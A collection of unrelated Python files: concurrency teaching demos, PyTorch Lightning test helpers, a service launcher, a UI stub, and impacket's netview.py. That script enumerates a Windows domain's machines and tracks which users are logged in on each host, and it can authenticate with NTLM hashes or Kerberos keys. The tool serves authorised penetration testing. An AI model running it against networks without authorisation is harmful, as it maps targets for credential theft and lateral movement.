sys.argv[1:], "", ["input_topic=", "output_topic=", "server="])
mydict = dict(opts)
input_topic = mydict.get('--input_topic', '')
output_topic = mydict.get('--output_topic', '')
bootstrap_servers = mydict.get('--server', '')
bootstrap_servers = bootstrap_servers.split(',')
init_kafka(bootstrap_servers, input_topic, output_topic)
notification_client = NotificationClient(
'localhost:50051', default_namespace="default")
notification_client.start_listen_event(key='KafkaWatcher', event_type='UNDEFINED', namespace="default",
watcher=KafkaWatcher(
bootstrap_servers, input_topic, output_topic),
start_time=0)
|
processsynch.py
|
import threading
import random
import time
import concurrent.futures
import logging
import queue
from random import randint
from time import sleep
import tkinter as tk
import os
from multiprocessing import Process, Queue, cpu_count
# from tkinter import *
class ToolTip(object):
def __init__(self, widget):
self.widget = widget
self.tipwindow = None
self.id = None
self.x = self.y = 0
def showtip(self, text):
"Display text in tooltip window"
self.text = text
if self.tipwindow or not self.text:
return
x, y, cx, cy = self.widget.bbox("insert")
x = x + self.widget.winfo_rootx() + 57
y = y + cy + self.widget.winfo_rooty() +27
self.tipwindow = tw = tk.Toplevel(self.widget)
tw.wm_overrideredirect(1)
tw.wm_geometry("+%d+%d" % (x, y))
label = tk.Label(tw, text=self.text, justify=tk.LEFT,
background="#ffffe0", relief=tk.SOLID, borderwidth=1,
font=("tahoma", "8", "normal"))
label.pack(ipadx=1)
def hidetip(self):
tw = self.tipwindow
self.tipwindow = None
if tw:
tw.destroy()
def CreateToolTip(widget, text):
toolTip = ToolTip(widget)
def enter(event):
toolTip.showtip(text)
def leave(event):
toolTip.hidetip()
widget.bind('<Enter>', enter)
widget.bind('<Leave>', leave)
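# Minimal usage sketch for the tooltip helper above (the widget and text are only examples):
#   root = tk.Tk()
#   btn = tk.Button(root, text="Run")
#   btn.pack()
#   CreateToolTip(btn, "Starts the selected simulation")
#   root.mainloop()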
# Dining philosophers, 5 Phillies with 5 forks. Must have two forks to eat.
#
# Deadlock is avoided by never waiting for a fork while holding a fork (locked).
# The procedure is a blocking acquire of the first fork followed by a non-blocking
# acquire of the second fork. If the second fork cannot be acquired, release the
# first fork, swap which fork is first and which is second, and retry until both are held.
#
class Philosopher(threading.Thread):
running = True
def __init__(self, xname, forkOnLeft, forkOnRight):
threading.Thread.__init__(self)
self.name = xname
self.forkOnLeft = forkOnLeft
self.forkOnRight = forkOnRight
def run(self):
while(self.running):
# Philosopher is thinking (but really is sleeping).
time.sleep( random.uniform(1,2))
print ('%s is hungry.' % self.name, file=open("oplogs/dp.txt", "a"))
self.dine()
def dine(self):
fork1, fork2 = self.forkOnLeft, self.forkOnRight
while self.running:
fork1.acquire(True)
locked = fork2.acquire(False)
if locked: break
fork1.release()
print ('%s swaps forks' % self.name, file=open("oplogs/dp.txt", "a"))
# self.TBox.insert(tk.INSERT, '{} swaps forks'.format(self.name))
fork1, fork2 = fork2, fork1
else:
return
self.dining()
fork2.release()
fork1.release()
def dining(self):
print ('%s starts eating '% self.name, file=open("oplogs/dp.txt", "a"))
time.sleep(random.uniform(0,1))
print ('%s finishes eating and leaves to think.' % self.name, file=open("oplogs/dp.txt", "a"))
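# A minimal standalone sketch of the acquisition strategy described in the comment
# above the Philosopher class: block on the first lock, try the second without blocking,
# and on failure release the first lock and swap the two before retrying.
# (Illustrative only; not used by dp() below.)
def _acquire_both_forks_sketch(fork1, fork2):
    while True:
        fork1.acquire(True)          # blocking acquire of the first fork
        if fork2.acquire(False):     # non-blocking attempt on the second fork
            return fork1, fork2      # both forks held; caller must release both
        fork1.release()              # could not get the second fork: back off
        fork1, fork2 = fork2, fork1  # swap roles and retry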
def dp():
def on_configure(event):
canvas.configure(scrollregion=canvas.bbox('all'))
root = tk.Tk()
root.title("Dining Philosophers")
canvas = tk.Canvas(root, height=600, width=400)
canvas.pack(side=tk.LEFT)
yscroll = tk.Scrollbar(root, command=canvas.yview)
yscroll.pack(side=tk.LEFT, fill='y')
canvas.configure(yscrollcommand = yscroll.set)
canvas.bind('<Configure>', on_configure)
frame = tk.Frame(canvas, background='white')
canvas.create_window((0,0), window=frame, anchor='nw')
f = open("oplogs/dp.txt", 'w')
f.close()
forks = [threading.Lock() for n in range(5)]
philosopherNames = ('Zeno','Seneca','Nietzsche','Aristotle', 'Buchanan')
philosophers= [Philosopher(philosopherNames[i], forks[i%5], forks[(i+1)%5]) for i in range(5)]
random.seed()
Philosopher.running = True
for p in philosophers: p.start()
time.sleep(3)
Philosopher.running = False
print ("Now we're finishing.", file=open("oplogs/dp.txt", "a"))
f = open("oplogs/dp.txt", 'r')
for line in f.readlines():
lbl = tk.Label(frame, text = line, background='white')
lbl.pack()
os.remove('oplogs/dp.txt')
root.mainloop()
# Use this to call the Dining-Philosophers function
# dp()
class ReaderWriter():
def __init__(self):
        self.rd = threading.Semaphore()   # semaphore guarding access to the reader count
        self.wrt = threading.Semaphore()  # semaphore guarding writes to the shared data
        self.readCount = 0                # number of readers currently reading
def reader(self):
while True:
            self.rd.acquire()        # wait on the read semaphore
            self.readCount += 1      # one more reader is active
            if self.readCount == 1:  # first reader blocks writers from the data
                self.wrt.acquire()   # wait on the write semaphore
            self.rd.release()        # signal on the read semaphore
            print("Reader", self.readCount, "is reading")
            self.rd.acquire()        # wait on the read semaphore
            self.readCount -= 1      # this reader has finished reading
            if self.readCount == 0:  # last reader lets writers proceed
                self.wrt.release()   # signal on the write semaphore; now a writer can write
            self.rd.release()        # signal on the read semaphore
time.sleep(0.05)
def writer(self):
while True:
            self.wrt.acquire()       # wait on the write semaphore
            print("Writing data.....")  # write the data
            print("-" * 20)
            self.wrt.release()       # signal on the write semaphore
time.sleep(0.05)
def main(self):
        # start multiple reader and writer threads
t1 = threading.Thread(target = self.reader)
t1.start()
t2 = threading.Thread(target = self.writer)
t2.start()
t3 = threading.Thread(target = self.reader)
t3.start()
t4 = threading.Thread(target = self.reader)
t4.start()
t6 = threading.Thread(target = self.writer)
t6.start()
t5 = threading.Thread(target = self.reader)
t5.start()
def rw():
c=ReaderWriter()
c.main()
#Use this to call Reader Writer
# rw()
def pc():
def producer(queue, event):
"""Pretend we're getting a number from the network."""
while not event.is_set():
message = random.randint(1, 101)
logging.info("Producer got message: %s", message)
queue.put(message)
logging.info("Producer received event. Exiting")
def consumer(queue, event):
"""Pretend we're saving a number in the database."""
while not event.is_set() or not queue.empty():
message = queue.get()
logging.info(
"Consumer storing message: %s (size=%d)", message, queue.qsize()
)
logging.info("Consumer received event. Exiting")
if __name__ == "__main__":
format = "%(asctime)s: %(message)s"
logging.basicConfig(format=format, level=logging.INFO,
datefmt="%H:%M:%S")
pipeline = queue.Queue(maxsize=10)
event = threading.Event()
with concurrent.futures.ThreadPoolExecutor(max_workers=2) as executor:
executor.submit(producer, pipeline, event)
executor.submit(consumer, pipeline, event)
time.sleep(0.1)
logging.info("Main: about to set event")
event.set()
#Use this to call Producer Consumer
# pc()
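# --- Illustrative variant (not part of the original pc() example) ---
# The same producer/consumer hand-off, but shutdown is signalled with a
# sentinel value on the queue instead of a threading.Event, so the consumer
# never blocks on an empty queue after the producer has finished.
def pc_sentinel(num_messages=5):
    import queue
    import random
    import threading
    pipeline = queue.Queue(maxsize=10)
    def producer():
        for _ in range(num_messages):
            pipeline.put(random.randint(1, 101))
        pipeline.put(None)                  # sentinel: nothing more will come
    def consumer():
        while True:
            message = pipeline.get()
            if message is None:             # sentinel seen -> stop consuming
                break
            print("consumed", message)
    threads = [threading.Thread(target=producer), threading.Thread(target=consumer)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
#Use this to call the sentinel-based Producer Consumer sketch
# pc_sentinel()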
def sb():
CUSTOMERS = 50
BARBERS = 3
WAITING_ROOM = 15
ARRIVAL_WAIT = 0.01
def wait():
time.sleep(ARRIVAL_WAIT * random.random())
class Barber(threading.Thread):
condition = threading.Condition()
customers = []
should_stop = threading.Event()
def run(self):
while self.should_stop.isSet() == False:
with self.condition:
if not self.customers:
# No customers, snore...
print("No Customers...", file=open("oplogs/sb.txt", "a"))
time.sleep(0.1 * random.random())
# Get the next customer
if self.customers:
current_customer = self.customers[0]
print("A new customer has sat down... ", file=open("oplogs/sb.txt", "a"))
# Actually service the next customer
if self.customers:
self.customers.pop(0)
current_customer.trim()
while current_customer.serviced.isSet() == False:
Customer().wait()
class Customer(threading.Thread):
WAIT = 0.05
def wait(self):
time.sleep(self.WAIT * random.random())
def trim(self): # Called from Barber thread
# Get a haircut
print("Cutting hair... ", file=open("oplogs/sb.txt", "a"))
time.sleep(0.1 * random.random())
print("Haircut finished ", file=open("oplogs/sb.txt", "a"))
self.serviced.set()
def run(self):
self.serviced = threading.Event()
# Grab the barbers' attention, add ourselves to the customers,
# and wait to be serviced
if len(Barber().customers) < WAITING_ROOM:
print("A new customer has entered... ", file=open("oplogs/sb.txt", "a"))
Barber().customers.append(self)
else:
print("Waiting room full, customer leaving... ", file=open("oplogs/sb.txt", "a"))
self.serviced.set()
while self.serviced.isSet() == False:
self.wait()
def sbstart():
barbers = []
def on_configure(event):
canvas.configure(scrollregion=canvas.bbox('all'))
root = tk.Tk()
root.title("Sleeping Barbers")
canvas = tk.Canvas(root, height=600, width=300)
canvas.pack(side=tk.LEFT, fill='both', expand=tk.TRUE)
yscroll = tk.Scrollbar(root, command=canvas.yview)
yscroll.pack(side=tk.LEFT, fill='y')
canvas.configure(yscrollcommand = yscroll.set)
canvas.bind('<Configure>', on_configure)
frame = tk.Frame(canvas, background='white')
canvas.create_window((0,0), window=frame, anchor='nw')
f = open("oplogs/sb.txt", 'w')
f.close()
print("Shop Opened", file=open("oplogs/sb.txt", "a"))
for i in range(BARBERS):
b = Barber()
barbers.append(b)
b.start()
all_customers = []
for c in range(CUSTOMERS):
wait()
c = Customer()
all_customers.append(c)
c.start()
for c in all_customers:
c.join() # Wait for all customers to leave
Barber().should_stop.set()
for b in barbers:
b.join() # Wait for the barbers to finish completely
print("All done for the day, Barber(s) leaving", file=open("oplogs/sb.txt", "a"))
f = open("oplogs/sb.txt", 'r')
for line in f.readlines():
lbl = tk.Label(frame, text = line, background='white')
lbl.pack()
os.remove('oplogs/sb.txt')
root.mainloop()
sbstart()
#Use this to call Sleeping Barber
# sb()
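# --- Illustrative sketch (an alternative shape, not a drop-in for the classes above) ---
# The canonical sleeping-barber pattern with a Condition variable: the barber
# actually sleeps in cond.wait() and each arriving customer wakes him with
# cond.notify(). All names below are ad hoc.
def sb_condition(num_customers=5):
    import random
    import threading
    import time
    waiting = []                            # shared waiting-room queue
    cond = threading.Condition()
    closed = threading.Event()
    def barber():
        while True:
            with cond:
                while not waiting and not closed.is_set():
                    cond.wait()             # sleep until a customer notifies
                if not waiting and closed.is_set():
                    return                  # shop closed, nobody waiting
                name = waiting.pop(0)
            time.sleep(0.05 * random.random())   # cut hair outside the lock
            print("finished haircut for", name)
    def customer(name):
        with cond:
            waiting.append(name)
            cond.notify()                   # wake the sleeping barber
    b = threading.Thread(target=barber)
    b.start()
    for i in range(num_customers):
        time.sleep(0.02 * random.random())
        customer("customer-%d" % i)
    with cond:
        closed.set()
        cond.notify()                       # let the barber observe the close flag
    b.join()
#Use this to call the Condition-based Sleeping Barber sketch
# sb_condition()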
|
develop_utils.py
|
import os
import numpy as np
# from pl_examples import LightningTemplateModel
from pytorch_lightning import seed_everything
from pytorch_lightning.callbacks import ModelCheckpoint
from pytorch_lightning.loggers import TensorBoardLogger, TestTubeLogger
from tests import TEMP_PATH, RANDOM_PORTS, RANDOM_SEEDS
from tests.base.model_template import EvalModelTemplate
import functools
def assert_speed_parity_relative(pl_times, pt_times, max_diff: float = 0.1):
# assert speeds
diffs = np.asarray(pl_times) - np.asarray(pt_times)
# norm by vanilla time
diffs = diffs / np.asarray(pt_times)
assert np.alltrue(diffs < max_diff), \
f"lightning {diffs} was slower than PT (threshold {max_diff})"
def assert_speed_parity_absolute(pl_times, pt_times, nb_epochs, max_diff: float = 0.6):
# assert speeds
diffs = np.asarray(pl_times) - np.asarray(pt_times)
# norm by vanila time
diffs = diffs / nb_epochs
assert np.alltrue(diffs < max_diff), \
f"lightning {diffs} was slower than PT (threshold {max_diff})"
def get_default_logger(save_dir, version=None):
# set up logger object without actually saving logs
logger = TensorBoardLogger(save_dir, name='lightning_logs', version=version)
return logger
def get_data_path(expt_logger, path_dir=None):
# some calls pass in only the experiment, not the complete logger
# each logger has to have these attributes
name, version = expt_logger.name, expt_logger.version
# only the test-tube experiment has such an attribute
if isinstance(expt_logger, TestTubeLogger):
expt = expt_logger.experiment if hasattr(expt_logger, 'experiment') else expt_logger
return expt.get_data_path(name, version)
# the other experiments...
if not path_dir:
if hasattr(expt_logger, 'save_dir') and expt_logger.save_dir:
path_dir = expt_logger.save_dir
else:
path_dir = TEMP_PATH
path_expt = os.path.join(path_dir, name, 'version_%s' % version)
# check whether the new sub-folder exists, the typical case for test-tube
if not os.path.isdir(path_expt):
path_expt = path_dir
return path_expt
def load_model_from_checkpoint(logger, root_weights_dir, module_class=EvalModelTemplate):
trained_model = module_class.load_from_checkpoint(root_weights_dir)
assert trained_model is not None, 'loading model failed'
return trained_model
def assert_ok_model_acc(trainer, key='test_acc', thr=0.5):
# this model should get 0.80+ acc
acc = trainer.callback_metrics[key]
assert acc > thr, f"Model failed to get expected {thr} accuracy. {key} = {acc}"
def reset_seed():
seed = RANDOM_SEEDS.pop()
seed_everything(seed)
def set_random_master_port():
reset_seed()
port = RANDOM_PORTS.pop()
os.environ['MASTER_PORT'] = str(port)
def init_checkpoint_callback(logger):
checkpoint = ModelCheckpoint(logger.save_dir)
return checkpoint
def pl_multi_process_test(func):
"""Wrapper for running multi-processing tests."""
@functools.wraps(func)
def wrapper(*args, **kwargs):
from multiprocessing import Process, Queue
queue = Queue()
def inner_f(queue, **kwargs):
try:
func(**kwargs)
queue.put(1)
except Exception:
import traceback
traceback.print_exc()
queue.put(-1)
proc = Process(target=inner_f, args=(queue,), kwargs=kwargs)
proc.start()
proc.join()
result = queue.get()
assert result == 1, 'expected 1, but returned %s' % result
return wrapper
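# Illustrative usage only -- the decorated test below is hypothetical and not
# part of the original module. The wrapped body runs in a child process; the
# wrapper reports success or failure through the queue sentinel shown above.
@pl_multi_process_test
def _example_isolated_test(**kwargs):
    assert 1 + 1 == 2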
|
__main__.py
|
from multiprocessing import Process
from cc_server.commons.configuration import Config
from cc_server.services.log.__main__ import main as log_main
from cc_server.services.master.__main__ import main as master_main
from cc_server.services.web.__main__ import main as web_main
from cc_server.services.files.__main__ import main as files_main
def main():
config = Config()
log = Process(target=log_main)
log.daemon = True
log.start()
master = Process(target=master_main)
master.daemon = True
master.start()
if config.server_files:
files = Process(target=files_main)
files.daemon = True
files.start()
web_main()
if __name__ == '__main__':
main()
|
netview.py
|
#!/usr/bin/env python
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Author:
# beto (@agsolino)
#
# Description:
# The idea of this script is to get a list of the sessions
# opened at the remote hosts and keep track of them.
# Coincidentally @mubix did something similar a few years
# ago so credit goes to him (and the script's name ;)).
# Check it out at https://github.com/mubix/netview
# The main difference with our approach is we keep
# looping over the hosts found and keep track of who logged
# in/out from remote servers. Plus, we keep the connections
# with the target systems and just send a few DCE-RPC packets.
#
# One VERY IMPORTANT thing is:
#
# YOU HAVE TO BE ABLE TO RESOLVE THE DOMAIN MACHINES' NETBIOS
# NAMES. That's usually solved by setting your DNS to the
# domain DNS (and the right search domain).
#
# Some examples of usage are:
#
# netview.py -target 192.168.1.10 beto
#
# This will show the sessions on 192.168.1.10 and will authenticate as 'beto'
# (password will be prompted)
#
# netview.py FREEFLY.NET/beto
#
# This will download all machines from FREEFLY.NET, authenticated as 'beto'
# and will gather the session information for those machines that appear
# to be up. There is a background thread checking aliveness of the targets
# at all times.
#
# netview.py -users /tmp/users -dc-ip freefly-dc.freefly.net -k FREEFLY.NET/beto
#
# This will download all machines from FREEFLY.NET, authenticating using
# Kerberos (that's why -dc-ip parameter is needed), and filter
# the output based on the list of users specified in /tmp/users file.
#
#
from __future__ import division
from __future__ import print_function
import sys
import argparse
import logging
import socket
from threading import Thread, Event
from queue import Queue
from time import sleep
from impacket.examples import logger
from impacket import version
from impacket.smbconnection import SessionError
from impacket.dcerpc.v5 import transport, wkst, srvs, samr
from impacket.dcerpc.v5.ndr import NULL
from impacket.dcerpc.v5.rpcrt import DCERPCException
from impacket.nt_errors import STATUS_MORE_ENTRIES
machinesAliveQueue = Queue()
machinesDownQueue = Queue()
myIP = None
def checkMachines(machines, stopEvent, singlePass=False):
origLen = len(machines)
deadMachines = machines
done = False
while not done:
if stopEvent.is_set():
done = True
break
for machine in deadMachines:
s = socket.socket()
try:
s = socket.create_connection((machine, 445), 2)
global myIP
myIP = s.getsockname()[0]
s.close()
machinesAliveQueue.put(machine)
except Exception as e:
logging.debug('%s: not alive (%s)' % (machine, e))
pass
else:
logging.debug('%s: alive!' % machine)
deadMachines.remove(machine)
if stopEvent.is_set():
done = True
break
logging.debug('up: %d, down: %d, total: %d' % (origLen-len(deadMachines), len(deadMachines), origLen))
if singlePass is True:
done = True
if not done:
sleep(10)
# Do we have some new deadMachines to add?
while machinesDownQueue.empty() is False:
deadMachines.append(machinesDownQueue.get())
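# Small illustrative helper (not used by the script itself): the same
# port-445 reachability probe checkMachines() performs, factored out for a
# single host.
def is_smb_reachable(machine, timeout=2):
    try:
        s = socket.create_connection((machine, 445), timeout)
        s.close()
        return True
    except Exception:
        return False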
class USERENUM:
def __init__(self, username='', password='', domain='', hashes=None, aesKey=None, doKerberos=False, options=None):
self.__username = username
self.__password = password
self.__domain = domain
self.__lmhash = ''
self.__nthash = ''
self.__aesKey = aesKey
self.__doKerberos = doKerberos
self.__kdcHost = options.dc_ip
self.__options = options
self.__machinesList = list()
self.__targets = dict()
self.__filterUsers = None
self.__targetsThreadEvent = None
self.__targetsThread = None
self.__maxConnections = int(options.max_connections)
if hashes is not None:
self.__lmhash, self.__nthash = hashes.split(':')
def getDomainMachines(self):
if self.__kdcHost is not None:
domainController = self.__kdcHost
elif self.__domain != '':
domainController = self.__domain
else:
raise Exception('A domain is needed!')
logging.info('Getting machine\'s list from %s' % domainController)
rpctransport = transport.SMBTransport(domainController, 445, r'\samr', self.__username, self.__password,
self.__domain, self.__lmhash, self.__nthash, self.__aesKey,
doKerberos=self.__doKerberos, kdcHost = self.__kdcHost)
dce = rpctransport.get_dce_rpc()
dce.connect()
dce.bind(samr.MSRPC_UUID_SAMR)
try:
resp = samr.hSamrConnect(dce)
serverHandle = resp['ServerHandle']
resp = samr.hSamrEnumerateDomainsInSamServer(dce, serverHandle)
domains = resp['Buffer']['Buffer']
logging.info("Looking up users in domain %s" % domains[0]['Name'])
resp = samr.hSamrLookupDomainInSamServer(dce, serverHandle,domains[0]['Name'] )
resp = samr.hSamrOpenDomain(dce, serverHandle = serverHandle, domainId = resp['DomainId'])
domainHandle = resp['DomainHandle']
status = STATUS_MORE_ENTRIES
enumerationContext = 0
while status == STATUS_MORE_ENTRIES:
try:
resp = samr.hSamrEnumerateUsersInDomain(dce, domainHandle, samr.USER_WORKSTATION_TRUST_ACCOUNT,
enumerationContext=enumerationContext)
except DCERPCException as e:
if str(e).find('STATUS_MORE_ENTRIES') < 0:
raise
resp = e.get_packet()
for user in resp['Buffer']['Buffer']:
self.__machinesList.append(user['Name'][:-1])
logging.debug('Machine name - rid: %s - %d'% (user['Name'], user['RelativeId']))
enumerationContext = resp['EnumerationContext']
status = resp['ErrorCode']
except Exception as e:
raise e
dce.disconnect()
def getTargets(self):
logging.info('Importing targets')
if self.__options.target is None and self.__options.targets is None:
# We need to download the list of machines from the domain
self.getDomainMachines()
elif self.__options.targets is not None:
for line in self.__options.targets.readlines():
self.__machinesList.append(line.strip(' \r\n'))
else:
# Just a single machine
self.__machinesList.append(self.__options.target)
logging.info("Got %d machines" % len(self.__machinesList))
def filterUsers(self):
if self.__options.user is not None:
self.__filterUsers = list()
self.__filterUsers.append(self.__options.user)
elif self.__options.users is not None:
# Grab users list from a file
self.__filterUsers = list()
for line in self.__options.users.readlines():
self.__filterUsers.append(line.strip(' \r\n'))
else:
self.__filterUsers = None
def run(self):
self.getTargets()
self.filterUsers()
#self.filterGroups()
# Up to here we should have figured out the scope of our work
self.__targetsThreadEvent = Event()
if self.__options.noloop is False:
# Start a separate thread checking the targets that are up
self.__targetsThread = Thread(target=checkMachines, args=(self.__machinesList,self.__targetsThreadEvent))
self.__targetsThread.start()
else:
# Since it's going to be a one-shot test, we need to wait till it finishes
checkMachines(self.__machinesList,self.__targetsThreadEvent, singlePass=True)
while True:
# Do we have more machines to add?
while machinesAliveQueue.empty() is False:
machine = machinesAliveQueue.get()
logging.debug('Adding %s to the up list' % machine)
self.__targets[machine] = {}
self.__targets[machine]['SRVS'] = None
self.__targets[machine]['WKST'] = None
self.__targets[machine]['Admin'] = True
self.__targets[machine]['Sessions'] = list()
self.__targets[machine]['LoggedIn'] = set()
for target in list(self.__targets.keys()):
try:
self.getSessions(target)
self.getLoggedIn(target)
except (SessionError, DCERPCException) as e:
# We will silently pass these ones, might be issues with Kerberos, or DCE
if str(e).find('LOGON_FAILURE') >=0:
# For some reason our credentials don't work there,
# taking it out from the list.
logging.error('STATUS_LOGON_FAILURE for %s, discarding' % target)
del(self.__targets[target])
elif str(e).find('INVALID_PARAMETER') >=0:
del(self.__targets[target])
elif str(e).find('access_denied') >=0:
# Can't access the target RPC call, most probably a Unix host
# taking it out from the list
del(self.__targets[target])
else:
logging.info(str(e))
pass
except KeyboardInterrupt:
raise
except Exception as e:
#import traceback
#traceback.print_exc()
if str(e).find('timed out') >=0:
# Most probably this site went down. taking it out
# ToDo: add it back to the list of machines to check in
# the separate thread - DONE
del(self.__targets[target])
machinesDownQueue.put(target)
else:
# These ones we will report
logging.error(e)
pass
if self.__options.noloop is True:
break
logging.debug('Sleeping for %s seconds' % self.__options.delay)
logging.debug('Currently monitoring %d active targets' % len(self.__targets))
sleep(int(self.__options.delay))
def getSessions(self, target):
if self.__targets[target]['SRVS'] is None:
stringSrvsBinding = r'ncacn_np:%s[\PIPE\srvsvc]' % target
rpctransportSrvs = transport.DCERPCTransportFactory(stringSrvsBinding)
if hasattr(rpctransportSrvs, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransportSrvs.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash,
self.__nthash, self.__aesKey)
rpctransportSrvs.set_kerberos(self.__doKerberos, self.__kdcHost)
dce = rpctransportSrvs.get_dce_rpc()
dce.connect()
dce.bind(srvs.MSRPC_UUID_SRVS)
self.__maxConnections -= 1
else:
dce = self.__targets[target]['SRVS']
try:
resp = srvs.hNetrSessionEnum(dce, '\x00', NULL, 10)
except Exception as e:
if str(e).find('Broken pipe') >= 0:
# The connection timed-out. Let's try to bring it back next round
self.__targets[target]['SRVS'] = None
self.__maxConnections += 1
return
else:
raise
if self.__maxConnections < 0:
# Can't keep this connection open. Closing it
dce.disconnect()
self.__maxConnections = 0
else:
self.__targets[target]['SRVS'] = dce
# Let's see who created a connection since last check
tmpSession = list()
printCRLF = False
for session in resp['InfoStruct']['SessionInfo']['Level10']['Buffer']:
userName = session['sesi10_username'][:-1]
sourceIP = session['sesi10_cname'][:-1][2:]
key = '%s\x01%s' % (userName, sourceIP)
myEntry = '%s\x01%s' % (self.__username, myIP)
tmpSession.append(key)
if not(key in self.__targets[target]['Sessions']):
# Skipping myself
if key != myEntry:
self.__targets[target]['Sessions'].append(key)
# Are we filtering users?
if self.__filterUsers is not None:
if userName in self.__filterUsers:
print("%s: user %s logged from host %s - active: %d, idle: %d" % (
target, userName, sourceIP, session['sesi10_time'], session['sesi10_idle_time']))
printCRLF = True
else:
print("%s: user %s logged from host %s - active: %d, idle: %d" % (
target, userName, sourceIP, session['sesi10_time'], session['sesi10_idle_time']))
printCRLF = True
# Let's see who deleted a connection since last check
for nItem, session in enumerate(self.__targets[target]['Sessions']):
userName, sourceIP = session.split('\x01')
if session not in tmpSession:
del(self.__targets[target]['Sessions'][nItem])
# Are we filtering users?
if self.__filterUsers is not None:
if userName in self.__filterUsers:
print("%s: user %s logged off from host %s" % (target, userName, sourceIP))
printCRLF=True
else:
print("%s: user %s logged off from host %s" % (target, userName, sourceIP))
printCRLF=True
if printCRLF is True:
print()
def getLoggedIn(self, target):
if self.__targets[target]['Admin'] is False:
return
if self.__targets[target]['WKST'] is None:
stringWkstBinding = r'ncacn_np:%s[\PIPE\wkssvc]' % target
rpctransportWkst = transport.DCERPCTransportFactory(stringWkstBinding)
if hasattr(rpctransportWkst, 'set_credentials'):
# This method exists only for selected protocol sequences.
rpctransportWkst.set_credentials(self.__username, self.__password, self.__domain, self.__lmhash,
self.__nthash, self.__aesKey)
rpctransportWkst.set_kerberos(self.__doKerberos, self.__kdcHost)
dce = rpctransportWkst.get_dce_rpc()
dce.connect()
dce.bind(wkst.MSRPC_UUID_WKST)
self.__maxConnections -= 1
else:
dce = self.__targets[target]['WKST']
try:
resp = wkst.hNetrWkstaUserEnum(dce,1)
except Exception as e:
if str(e).find('Broken pipe') >= 0:
# The connection timed-out. Let's try to bring it back next round
self.__targets[target]['WKST'] = None
self.__maxConnections += 1
return
elif str(e).upper().find('ACCESS_DENIED') >= 0:
# We're not admin, bye
dce.disconnect()
self.__maxConnections += 1
self.__targets[target]['Admin'] = False
return
else:
raise
if self.__maxConnections < 0:
# Can't keep this connection open. Closing it
dce.disconnect()
self.__maxConnections = 0
else:
self.__targets[target]['WKST'] = dce
# Let's see who logged in locally since last check
tmpLoggedUsers = set()
printCRLF = False
for session in resp['UserInfo']['WkstaUserInfo']['Level1']['Buffer']:
userName = session['wkui1_username'][:-1]
logonDomain = session['wkui1_logon_domain'][:-1]
key = '%s\x01%s' % (userName, logonDomain)
tmpLoggedUsers.add(key)
if not(key in self.__targets[target]['LoggedIn']):
self.__targets[target]['LoggedIn'].add(key)
# Are we filtering users?
if self.__filterUsers is not None:
if userName in self.__filterUsers:
print("%s: user %s\\%s logged in LOCALLY" % (target,logonDomain,userName))
printCRLF=True
else:
print("%s: user %s\\%s logged in LOCALLY" % (target,logonDomain,userName))
printCRLF=True
# Let's see who logged out since last check
for session in self.__targets[target]['LoggedIn'].copy():
userName, logonDomain = session.split('\x01')
if session not in tmpLoggedUsers:
self.__targets[target]['LoggedIn'].remove(session)
# Are we filtering users?
if self.__filterUsers is not None:
if userName in self.__filterUsers:
print("%s: user %s\\%s logged off LOCALLY" % (target,logonDomain,userName))
printCRLF=True
else:
print("%s: user %s\\%s logged off LOCALLY" % (target,logonDomain,userName))
printCRLF=True
if printCRLF is True:
print()
def stop(self):
if self.__targetsThreadEvent is not None:
self.__targetsThreadEvent.set()
# Process command-line arguments.
if __name__ == '__main__':
print(version.BANNER)
parser = argparse.ArgumentParser()
parser.add_argument('identity', action='store', help='[domain/]username[:password]')
parser.add_argument('-user', action='store', help='Filter output by this user')
parser.add_argument('-users', type=argparse.FileType('r'), help='input file with list of users to filter to output for')
#parser.add_argument('-group', action='store', help='Filter output by members of this group')
#parser.add_argument('-groups', type=argparse.FileType('r'), help='Filter output by members of the groups included in the input file')
parser.add_argument('-target', action='store', help='target system to query info from. If not specified script will '
'run in domain mode.')
parser.add_argument('-targets', type=argparse.FileType('r'), help='input file with targets system to query info '
'from (one per line). If not specified script will run in domain mode.')
parser.add_argument('-noloop', action='store_true', default=False, help='Stop after the first probe')
parser.add_argument('-delay', action='store', default = '10', help='seconds delay between starting each batch probe '
'(default 10 seconds)')
parser.add_argument('-max-connections', action='store', default='1000', help='Max amount of connections to keep '
'opened (default 1000)')
parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
group = parser.add_argument_group('authentication')
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
'(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the '
'ones specified in the command line')
group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication '
'(128 or 256 bits)')
group.add_argument('-dc-ip', action='store',metavar = "ip address", help='IP Address of the domain controller. If '
'omitted it will use the domain part (FQDN) specified in the target parameter')
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
options = parser.parse_args()
# Init the example's logger theme
logger.init(options.ts)
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
# Print the Library's installation path
logging.debug(version.getInstallationPath())
else:
logging.getLogger().setLevel(logging.INFO)
import re
domain, username, password = re.compile('(?:(?:([^/:]*)/)?([^:]*)(?::(.*))?)?').match(options.identity).groups(
'')
try:
if domain is None:
domain = ''
if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
from getpass import getpass
password = getpass("Password:")
if options.aesKey is not None:
options.k = True
executer = USERENUM(username, password, domain, options.hashes, options.aesKey, options.k, options)
executer.run()
except Exception as e:
if logging.getLogger().level == logging.DEBUG:
import traceback
traceback.print_exc()
logging.error(e)
executer.stop()
except KeyboardInterrupt:
logging.info('Quitting.. please wait')
executer.stop()
sys.exit(0)
|
UI.py
|
# coding: utf-8
import sys
from PyQt5 import QtWidgets
from PyQt5 import uic
from PyQt5.QtCore import pyqtSlot
from env.Strategies import *
from run import main as program
from pathlib import Path
import os
import threading
import matplotlib.pyplot as plt
os.environ['KMP_DUPLICATE_LIB_OK'] = 'True'
class Form(QtWidgets.QDialog):
def __init__(self, parent=None):
QtWidgets.QDialog.__init__(self, parent)
